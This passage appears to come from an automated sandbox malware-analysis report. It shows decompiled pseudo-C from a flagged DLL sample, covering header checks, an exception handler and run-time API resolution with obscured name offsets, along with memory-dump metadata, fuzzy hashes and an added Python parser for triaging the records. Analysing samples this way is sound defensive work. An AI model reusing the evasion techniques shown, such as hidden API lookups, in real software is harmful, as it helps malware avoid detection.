                                                                													_t86 = _t84 + 1;
                                                                													__eflags = _t86;
                                                                													 *0x10004178 = _t86;
                                                                												}
                                                                												goto L58;
                                                                											} else {
                                                                												do {
                                                                													_t68 = 0x10004180 + _t94 * 4;
                                                                													_t94 = _t94 + 1;
                                                                													__eflags = _t94 - _t77;
                                                                													 *_t68 = _t110;
                                                                													_t110 =  *_t68;
                                                                												} while (_t94 <= _t77);
                                                                												goto L56;
                                                                											}
                                                                										}
                                                                										_t69 = 0x1000417c + _t84 * 4;
                                                                										while(1) {
                                                                											__eflags =  *_t69 - _t110;
                                                                											if( *_t69 == _t110) {
                                                                												goto L51;
                                                                											}
                                                                											_t93 = _t93 - 1;
                                                                											_t69 = _t69 - 4;
                                                                											__eflags = _t93;
                                                                											if(_t93 > 0) {
                                                                												continue;
                                                                											}
                                                                											goto L51;
                                                                										}
                                                                										goto L51;
                                                                									}
                                                                									_t87 = _v32;
                                                                									__eflags =  *_t87 - 0x5a4d;
                                                                									if( *_t87 != 0x5a4d) {
                                                                										goto L59;
                                                                									}
                                                                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                									__eflags =  *_t71 - 0x4550;
                                                                									if( *_t71 != 0x4550) {
                                                                										goto L59;
                                                                									}
                                                                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                										goto L59;
                                                                									}
                                                                									_t78 = _t76 - _t87;
                                                                									__eflags =  *((short*)(_t71 + 6));
                                                                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                									if( *((short*)(_t71 + 6)) <= 0) {
                                                                										goto L59;
                                                                									}
                                                                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                									__eflags = _t78 - _t72;
                                                                									if(_t78 < _t72) {
                                                                										goto L46;
                                                                									}
                                                                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                										goto L46;
                                                                									}
                                                                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                										goto L20;
                                                                									}
                                                                									goto L46;
                                                                								}
                                                                							} else {
                                                                								goto L16;
                                                                							}
                                                                							while(1) {
                                                                								L16:
                                                                								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                                                								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                                                									break;
                                                                								}
                                                                								_t58 = _t58 + 1;
                                                                								__eflags = _t58 - _t81;
                                                                								if(_t58 < _t81) {
                                                                									continue;
                                                                								}
                                                                								goto L18;
                                                                							}
                                                                							__eflags = _t58;
                                                                							if(_t58 <= 0) {
                                                                								goto L5;
                                                                							}
                                                                							 *0x100041c0 = 1;
                                                                							__eflags =  *0x100041c0;
                                                                							if( *0x100041c0 != 0) {
                                                                								goto L5;
                                                                							}
                                                                							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                                                							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                                                								L32:
                                                                								_t100 = 0;
                                                                								__eflags = _t58;
                                                                								if(_t58 < 0) {
                                                                									L34:
                                                                									 *0x100041c0 = 0;
                                                                									goto L5;
                                                                								} else {
                                                                									goto L33;
                                                                								}
                                                                								do {
                                                                									L33:
                                                                									_t90 = 0x10004180 + _t100 * 4;
                                                                									_t100 = _t100 + 1;
                                                                									__eflags = _t100 - _t58;
                                                                									 *_t90 = _t110;
                                                                									_t110 =  *_t90;
                                                                								} while (_t100 <= _t58);
                                                                								goto L34;
                                                                							}
                                                                							_t58 = _t81 - 1;
                                                                							__eflags = _t58;
                                                                							if(_t58 < 0) {
                                                                								L28:
                                                                								__eflags = _t81 - 0x10;
                                                                								if(_t81 < 0x10) {
                                                                									_t81 = _t81 + 1;
                                                                									__eflags = _t81;
                                                                									 *0x10004178 = _t81;
                                                                								}
                                                                								_t58 = _t81 - 1;
                                                                								goto L32;
                                                                							} else {
                                                                								goto L25;
                                                                							}
                                                                							while(1) {
                                                                								L25:
                                                                								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                                                								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                                                									break;
                                                                								}
                                                                								_t58 = _t58 - 1;
                                                                								__eflags = _t58;
                                                                								if(_t58 >= 0) {
                                                                									continue;
                                                                								}
                                                                								break;
                                                                							}
                                                                							__eflags = _t58;
                                                                							if(__eflags >= 0) {
                                                                								if(__eflags == 0) {
                                                                									goto L34;
                                                                								}
                                                                								goto L32;
                                                                							}
                                                                							goto L28;
                                                                						}
                                                                						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                						__eflags = _t75 - _v8;
                                                                						if(_t75 < _v8) {
                                                                							goto L20;
                                                                						}
                                                                						__eflags = _t75 - _t108;
                                                                						if(_t75 >= _t108) {
                                                                							goto L20;
                                                                						}
                                                                						goto L15;
                                                                					}
                                                                					L5:
                                                                					_t63 = 1;
                                                                					goto L60;
                                                                				} else {
                                                                					goto L3;
                                                                				}
                                                                			}
                                                                0x10002418
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                APIs
                                                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002486
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryQueryVirtual
                                                                • String ID:
                                                                • API String ID: 2850889275-0
                                                                • Opcode ID: e296e1fa631b054d567712d19c0ab76cc5d24d25f82f26ed71351941662be75e
                                                                • Instruction ID: f35057221c5491e74c9434013e617d5b9a1dbcad0d33e4fc59ed5e506bc34830
                                                                • Opcode Fuzzy Hash: e296e1fa631b054d567712d19c0ab76cc5d24d25f82f26ed71351941662be75e
                                                                • Instruction Fuzzy Hash: C661FF70A00A529FFB59CF28CDE065937E5FB883D5F268039D806C729DEB30DC828654
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: 0a220eb0ad394ce7f48bb1dfebb681eba04389026c898d08045ceb5f49e526cc
                                                                • Instruction ID: 22cd638a52475023aefe711c528df42880fdcca086e0736978ca21b8b66986ae
                                                                • Opcode Fuzzy Hash: 0a220eb0ad394ce7f48bb1dfebb681eba04389026c898d08045ceb5f49e526cc
                                                                • Instruction Fuzzy Hash: 51516976A0021ADFEF14CF84DD80BA9B7B5FF84324F199195D8086B256D734AE81EF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: 89354d468e3c39c9a9a37c07fa0284997cac03410efa2b11ca178cd160fd0644
                                                                • Instruction ID: 7652f06f680cc0d5bd16e31b536db5288ef487b95a4ef6bd19b435458c171739
                                                                • Opcode Fuzzy Hash: 89354d468e3c39c9a9a37c07fa0284997cac03410efa2b11ca178cd160fd0644
                                                                • Instruction Fuzzy Hash: 96516076A00219DFDF20CF44CD84BA9B3B5FF84324F158595D9086B252D734AE85FB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                                                • Instruction ID: c25b815e3404997479a21346cb6a9cb7ecd6b216baaa56bbf5d480d69c7ff4e1
                                                                • Opcode Fuzzy Hash: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                                                • Instruction Fuzzy Hash: 9C418C76A00206DFEB20DF84CD80FA9B7B5FF88724F148194D9096B286C734AE80EF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: a534759c3a52090aba65ede1290774646e6cce45eb3ec6fed2a8c11357ddeac0
                                                                • Instruction ID: e793fe24affcdeedab6acc7eee4e8aafa2bc690584479c37e309809bfcda61e5
                                                                • Opcode Fuzzy Hash: a534759c3a52090aba65ede1290774646e6cce45eb3ec6fed2a8c11357ddeac0
                                                                • Instruction Fuzzy Hash: CD417E76A0021ADFDF20CF44DD84BA9B7B5FB88324F159195D9086B296D734EE81EB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 019e1bbd259f16fb127025000a77ff926888dac359d834cdd0fe3fdb5375895b
                                                                • Instruction ID: c056b9ddb8f53b28bcf730e561d915ecf28d8c53d141cf4d13dce9ccd53ddc3f
                                                                • Opcode Fuzzy Hash: 019e1bbd259f16fb127025000a77ff926888dac359d834cdd0fe3fdb5375895b
                                                                • Instruction Fuzzy Hash: 5D214CEB4016C22BEF809479A46A7D61790D7737D1FA5B804C7705F583A49E369F7340
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2cfe75d20c724e3de4a904ed1e4f7d2c3d0319f8937dd1d43310649163742dca
                                                                • Instruction ID: ceecfffd77daa5ee513b7f2ab582d76ff8dac90cdc970e6228bcdd4ef48115db
                                                                • Opcode Fuzzy Hash: 2cfe75d20c724e3de4a904ed1e4f7d2c3d0319f8937dd1d43310649163742dca
                                                                • Instruction Fuzzy Hash: 232149EB8016C22BEE809839A46A7D61790D7B37D1FA5B804C7705F583A49E369F7340
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
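The function records above repeat one fixed layout (Memory Dump Source, API ID, String ID, Opcode/Instruction fuzzy hashes) hundreds of times per report, and the detail that matters for triage is buried in it: four near-identical functions carrying the string `t32c` live in the dump at 0x00F00000, which is flagged "based on PE: false", i.e. memory not backed by an image on disk, while the NtQueryVirtualMemory caller sits in the loaded DLL image at 0x10000000. The following parser is an added example by the editor, not part of the Joe Sandbox report or its tooling; it reads that record format, groups functions by memory region, and counts repeated (region, String ID, API ID) tuples. The sample text is a constructed excerpt of three records copied from this section; the regular expressions encode the layout as it appears here and are an assumption about the format elsewhere.

```python
"""Triage helper for the per-function records in a Joe Sandbox report.

Added example (editor's, not from the report): parses the Memory Dump
Source / API ID / String ID / fuzzy-hash blocks and groups them by region,
so functions in a non-PE-backed dump (unpacked or injected code) stand out.
"""
import re
from collections import defaultdict

# Constructed sample: three records copied from the section above, shortened.
SAMPLE_REPORT = """\
APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002486
Memory Dump Source
• Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
Yara matches
Similarity
• API ID: MemoryQueryVirtual
• String ID:
• API String ID: 2850889275-0
• Opcode ID: e296e1fa631b054d567712d19c0ab76cc5d24d25f82f26ed71351941662be75e
• Instruction ID: f35057221c5491e74c9434013e617d5b9a1dbcad0d33e4fc59ed5e506bc34830
• Opcode Fuzzy Hash: e296e1fa631b054d567712d19c0ab76cc5d24d25f82f26ed71351941662be75e
• Instruction Fuzzy Hash: C661FF70A00A529FFB59CF28CDE065937E5FB883D5F268039D806C729DEB30DC828654
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
Similarity
• API ID:
• String ID: t32c
• API String ID: 0-3674199949
• Opcode ID: 0a220eb0ad394ce7f48bb1dfebb681eba04389026c898d08045ceb5f49e526cc
• Instruction ID: 22cd638a52475023aefe711c528df42880fdcca086e0736978ca21b8b66986ae
• Opcode Fuzzy Hash: 0a220eb0ad394ce7f48bb1dfebb681eba04389026c898d08045ceb5f49e526cc
• Instruction Fuzzy Hash: 51516976A0021ADFEF14CF84DD80BA9B7B5FF84324F199195D8086B256D734AE81EF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
Similarity
• API ID:
• String ID: t32c
• API String ID: 0-3674199949
• Opcode ID: 89354d468e3c39c9a9a37c07fa0284997cac03410efa2b11ca178cd160fd0644
• Instruction ID: 7652f06f680cc0d5bd16e31b536db5288ef487b95a4ef6bd19b435458c171739
• Opcode Fuzzy Hash: 89354d468e3c39c9a9a37c07fa0284997cac03410efa2b11ca178cd160fd0644
• Instruction Fuzzy Hash: 96516076A00219DFDF20CF44CD84BA9B3B5FF84324F158595D9086B252D734AE85FB80
Uniqueness

Uniqueness Score: -1.00%
"""

# Field layout as it appears in this report (assumed stable across records).
_SOURCE_RE = re.compile(
    r"Source File: (?P<dump>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)"
)
_API_CALL_RE = re.compile(r"^\W*(?P<api>\w+)\.(?P<module>\w+)\(", re.MULTILINE)
_FIELD_RE = re.compile(
    r"^\W*(?P<key>API ID|String ID|Opcode ID|Instruction Fuzzy Hash): ?(?P<val>.*)$",
    re.MULTILINE,
)


def parse_records(text):
    """Split the report text into one dict per function record."""
    records = []
    # Every record ends with its "Uniqueness Score" line; split on that.
    for chunk in re.split(r"Uniqueness Score:[^\n]*\n?", text):
        m = _SOURCE_RE.search(chunk)
        if not m:
            continue  # trailing whitespace, or a chunk without a dump source
        rec = {
            "dump": m.group("dump"),
            "region": int(m.group("offset"), 16),
            "pe_backed": m.group("pe") == "true",
            # "module!api" for each resolved call listed under APIs
            "apis": [f"{c.group('module')}!{c.group('api')}"
                     for c in _API_CALL_RE.finditer(chunk)],
        }
        for f in _FIELD_RE.finditer(chunk):
            rec[f.group("key")] = f.group("val").strip()
        records.append(rec)
    return records


def summarize_by_region(records):
    """Group records by (region base, PE-backed flag): count, APIs, string IDs."""
    summary = {}
    for rec in records:
        key = (rec["region"], rec["pe_backed"])
        entry = summary.setdefault(key, {"functions": 0, "apis": set(), "string_ids": set()})
        entry["functions"] += 1
        entry["apis"].update(rec["apis"])
        if rec.get("String ID"):
            entry["string_ids"].add(rec["String ID"])
    return summary


def cluster_by_string(records):
    """Count functions per (region, String ID, API ID); repeated tuples inside a
    non-PE-backed region are the first candidates to dump and diff by hand."""
    counts = defaultdict(int)
    for rec in records:
        counts[(rec["region"], rec.get("String ID", ""), rec.get("API ID", ""))] += 1
    return dict(counts)


def unpacked_regions(summary):
    """Region bases whose dump is not backed by a PE on disk (unpacked/injected)."""
    return sorted(region for (region, pe) in summary if not pe)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    summ = summarize_by_region(recs)
    for (region, pe), e in sorted(summ.items()):
        print(f"{region:#010x} pe_backed={pe} functions={e['functions']} "
              f"apis={sorted(e['apis'])} strings={sorted(e['string_ids'])}")
    for key, n in cluster_by_string(recs).items():
        if n > 1:
            print("repeated:", key, n)
```

Run it against the full report text instead of `SAMPLE_REPORT` and the non-PE-backed region list tells you which dumps to carve, while the repeated-tuple counts show how many copies of the same string-referencing routine the unpacked stage carries.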

                                                                C-Code - Quality: 71%
			/* Editor's note: the per-line instruction addresses that the report shows in a
			   separate column are merged here as trailing comments; statements the decompiler
			   does not map to an address carry none. The shape of the routine (exception flags
			   tested against 0x6 = EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND, a scope table
			   walked by try level, a filter called through a function pointer, then unwind
			   and handler dispatch) is that of an MSVC-style SEH frame handler; the return
			   values 1 and 0 correspond to ExceptionContinueSearch and
			   ExceptionContinueExecution. The three statements before "_t89 = _t95" sit at
			   0x100021b8-0x100021ba, ahead of the real prologue, and read as mis-decoded bytes. */
			E100021B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t55;                                   /* used below but undeclared in the decompiler output */
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;                                  /* 0x100021b8 */
				_t65 = __ebx + 2;                             /* 0x100021b9 */
				 *_t43 =  *_t43 ^ __edx ^  *__eax;            /* 0x100021ba */
				_t89 = _t95;                                  /* 0x100021bd */
				_t96 = _t95 - 8;                              /* 0x100021bf */
				_push(_t65);                                  /* 0x100021c2 */
				_push(_t84);                                  /* 0x100021c3 */
				_push(_t89);                                  /* 0x100021c5 */
				asm("cld");                                   /* 0x100021c6 */
				_t66 = _a8;                                   /* 0x100021c7  registration record */
				_t44 = _a4;                                   /* 0x100021ca  exception record */
				if(( *(_t44 + 4) & 0x00000006) != 0) {        /* 0x100021d4  unwinding? */
					_push(_t89);                              /* 0x10002285 */
					E1000231B(_t66 + 0x10, _t66, 0xffffffff); /* 0x1000228c  local unwind to level -1 */
					_t46 = 1;                                 /* 0x10002295 */
				} else {                                      /* 0x100021da */
					_v12 = _t44;                              /* 0x100021da */
					_v8 = _a12;                               /* 0x100021e0 */
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;       /* 0x100021e6  exception pointers stored below the frame */
					_t86 =  *(_t66 + 0xc);                    /* 0x100021e9  current try level */
					_t80 =  *(_t66 + 8);                      /* 0x100021ec  scope table */
					_t49 = E100023D5(_t66);                   /* 0x100021f0 */
					_t99 = _t96 + 4;                          /* 0x100021f5 */
					if(_t49 == 0) {                           /* 0x100021fa */
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008; /* 0x1000227a */
						goto L11;
					} else {                                  /* 0x100021fc */
						while(_t86 != 0xffffffff) {           /* 0x100021fc */
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4)); /* 0x10002208  filter of this level */
							if(_t53 == 0) {                   /* 0x1000220a */
								L8:                           /* 0x10002265 */
								_t80 =  *(_t66 + 8);          /* 0x10002265 */
								_t86 = _t80[_t86 + _t86 * 2]; /* 0x1000226b  previous try level */
								continue;
							} else {                          /* 0x1000220c */
								_t54 =  *_t53();              /* 0x1000221b  call the filter */
								_t89 = _t89;                  /* 0x1000221d */
								_t86 = _t86;                  /* 0x1000221e */
								_t66 = _a8;                   /* 0x1000221f */
								_t55 = _t54;                  /* 0x10002222 */
								_t106 = _t54;                 /* 0x10002222 */
								if(_t106 == 0) {              /* 0x10002224  EXCEPTION_CONTINUE_SEARCH */
									goto L8;
								} else {                      /* 0x10002226 */
									if(_t106 < 0) {           /* 0x10002226  EXCEPTION_CONTINUE_EXECUTION */
										_t46 = 0;             /* 0x10002270 */
									} else {                  /* 0x10002228  EXCEPTION_EXECUTE_HANDLER */
										_t82 =  *(_t66 + 8);  /* 0x10002228 */
										E100022C0(_t55, _t66); /* 0x1000222c */
										_t89 = _t66 + 0x10;   /* 0x10002234 */
										E1000231B(_t89, _t66, 0); /* 0x10002239 */
										_t99 = _t99 + 0xc;    /* 0x1000223e */
										E100023B7(_t82[2]);   /* 0x1000224a */
										 *(_t66 + 0xc) =  *_t82; /* 0x10002252 */
										_t66 = 0;             /* 0x10002259 */
										_t86 = 0;             /* 0x1000225f */
										 *(_t82[2])(1);       /* 0x10002263  enter the handler */
										goto L8;
									}                         /* 0x10002263 */
								}                             /* 0x10002226 */
							}                                 /* 0x10002224 */
							goto L13;
						}                                     /* 0x1000220a */
						L11:                                  /* 0x1000227e */
						_t46 = 1;                             /* 0x1000227e */
					}                                         /* 0x1000227e */
				}                                             /* 0x100021fa */
				L13:                                          /* 0x1000229a */
				return _t46;                                  /* 0x100022a1 */
			}

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9cfe4f0bdb6303ce2c4ac46461865294472408feb2a20d02b7d0b95a6f7ac4f
                                                                • Instruction ID: 998f964cf8a00a12d388af1eaf269aed7343e4ee342723e71f6604d3686ecfb7
                                                                • Opcode Fuzzy Hash: b9cfe4f0bdb6303ce2c4ac46461865294472408feb2a20d02b7d0b95a6f7ac4f
                                                                • Instruction Fuzzy Hash: 7821CB37904204AFDB10DFA8C8C09ABF7A5FF49390B468168DD159B249D730FA15C7E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
			/* Editor's note: this routine builds a 0x20-byte context of function pointers
			   resolved at run time. The module name and the five export names are not literal
			   pointers: each is a value read from 0x10004144 plus a fixed address in the
			   image's data, so none of them appears in the import table (the report's
			   "dynamically determine API calls" signature). The return value is a Win32 error
			   code: 8 = ERROR_NOT_ENOUGH_MEMORY, 0x7f = ERROR_PROC_NOT_FOUND, 0 = success. */
			E10001015(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001B5A(0x20);                                  /* allocate the context */
				if(_t56 == 0) {
					_v8 = 8;                                             /* ERROR_NOT_ENOUGH_MEMORY */
				} else {
					_t50 = GetModuleHandleA( *0x10004144 + 0x10005014);  /* module name reached via the global delta */
					_v8 = 0x7f;                                          /* ERROR_PROC_NOT_FOUND unless every lookup succeeds */
					_t29 = GetProcAddress(_t50,  *0x10004144 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000167E(_t56);                                 /* failure path: release the context */
					} else {
						_t33 = GetProcAddress(_t50,  *0x10004144 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10004144 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10004144 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10004144 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;         /* caller-supplied values kept in the context */
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E1000119D(_t56, _a12);            /* second-stage initialisation; nonzero = error */
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;                       /* hand the context back to the caller */
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}
                                                                0x10001023
                                                                0x10001027
                                                                0x100010e8
                                                                0x1000102d
                                                                0x10001045
                                                                0x10001054
                                                                0x1000105b
                                                                0x1000105d
                                                                0x10001062
                                                                0x100010e0
                                                                0x100010e1
                                                                0x10001064
                                                                0x10001071
                                                                0x10001073
                                                                0x10001078
                                                                0x00000000
                                                                0x1000107a
                                                                0x10001087
                                                                0x10001089
                                                                0x1000108e
                                                                0x00000000
                                                                0x10001090
                                                                0x1000109d
                                                                0x1000109f
                                                                0x100010a4
                                                                0x00000000
                                                                0x100010a6
                                                                0x100010b3
                                                                0x100010b5
                                                                0x100010ba
                                                                0x00000000
                                                                0x100010bc
                                                                0x100010c2
                                                                0x100010c8
                                                                0x100010cd
                                                                0x100010d2
                                                                0x100010d7
                                                                0x00000000
                                                                0x100010d9
                                                                0x100010dc
                                                                0x100010dc
                                                                0x100010d7
                                                                0x100010ba
                                                                0x100010a4
                                                                0x1000108e
                                                                0x10001078
                                                                0x10001062
                                                                0x100010f6

                                                                APIs
                                                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,751463F0,00000000), ref: 10001B66
                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001135,?,?,?,?,?,00000002,?,?), ref: 10001039
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000105B
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001071
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001087
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000109D
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 100010B3
                                                                  • Part of subcall function 1000119D: memset.NTDLL ref: 1000121C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$AllocHandleHeapModulememset
                                                                • String ID:
                                                                • API String ID: 426539879-0
                                                                • Opcode ID: b288b49a4e8b1c137c23ed9d2ec13d74b578a45b68eb5a836a89574cd346c7cf
                                                                • Instruction ID: 2943e8e674912cac2eae58d6d970e7e89ef88163b07fe81432c65c35558539c2
                                                                • Opcode Fuzzy Hash: b288b49a4e8b1c137c23ed9d2ec13d74b578a45b68eb5a836a89574cd346c7cf
                                                                • Instruction Fuzzy Hash: 70214DB060074AAFE711DFAACC90A9BB7ECEF443C17018466F544C7219EBB1E944CB60
                                                                Uniqueness
                                                                • Uniqueness Score: -1.00%